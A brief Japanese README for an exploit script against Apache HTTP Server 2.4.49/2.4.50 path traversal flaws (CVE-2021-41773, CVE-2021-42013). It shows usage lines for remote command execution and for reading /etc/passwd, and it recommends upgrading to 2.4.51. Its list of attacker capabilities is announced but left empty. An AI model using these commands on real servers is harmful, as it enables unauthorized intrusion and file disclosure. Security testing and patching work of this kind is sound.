
CVE-2021-41773 & CVE-2021-42013
これらは、Apache HTTP Server 2.4.49 および 2.4.50 に影響を与える重大なパストラバーサル脆弱性です。
これらにより攻撃者は以下を実行できます:
どちらの脆弱性も Apache 2.4.51 で修正済みです。
直ちにアップグレードすることを強く推奨します。
python3 exploit.py --url <TARGET> --port [PORT] (--rce --command "COMMAND" | --lfi --path "/path/to/file")
使用例
python3 exploit.py --url http://192.168.1.10 --rce --command "id"

python3 exploit.py --url http://192.168.1.10 --lfi --path "/etc/passwd"

このエクスプロイトスクリプトは、許可されたセキュリティテスト、防御研究、および教育目的のみを対象としています。